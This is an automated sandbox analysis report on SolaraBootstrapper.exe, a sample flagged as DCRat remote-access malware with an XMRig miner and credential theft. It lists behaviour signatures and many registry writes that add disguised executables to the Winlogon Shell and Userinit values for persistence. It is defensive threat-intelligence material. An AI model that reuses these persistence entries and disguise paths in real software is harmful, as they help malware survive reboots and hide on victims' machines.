Malware Analysis Report

2024-11-15 05:53

Sample ID 240721-yckqsstdpm
Target SolaraBootstrapper.exe
SHA256 1f3a8ed14dcf8dd8b4a88787b08163b9e9d65d999e61645b90c0c91b6a8f71fd
Tags
rat dcrat xmrig execution infostealer miner persistence privilege_escalation spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1f3a8ed14dcf8dd8b4a88787b08163b9e9d65d999e61645b90c0c91b6a8f71fd

Threat Level: Known bad

The file SolaraBootstrapper.exe was found to be: Known bad.

Malicious Activity Summary

rat dcrat xmrig execution infostealer miner persistence privilege_escalation spyware stealer

Process spawned unexpected child process

DCRat payload

Dcrat family

xmrig

Modifies WinLogon for persistence

DcRat

XMRig Miner payload

DCRat payload

Command and Scripting Interpreter: PowerShell

Event Triggered Execution: AppInit DLLs

Loads dropped DLL

Reads user/profile data of web browsers

Checks computer location settings

Executes dropped EXE

.NET Reactor proctector

Enumerates connected drives

Looks up external IP address via web service

Blocklisted process makes network request

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-21 19:38

Signatures

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Dcrat family

dcrat

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-21 19:38

Reported

2024-07-21 19:51

Platform

win10v2004-20240709-en

Max time kernel

47s

Max time network

601s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\xdwdSublime Text.exe" C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\", \"C:\\DriversavessessionDlldhcp\\sysmon.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\", \"C:\\DriversavessessionDlldhcp\\sysmon.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\", \"C:\\DriversavessessionDlldhcp\\sysmon.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\", \"C:\\DriversavessessionDlldhcp\\sysmon.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
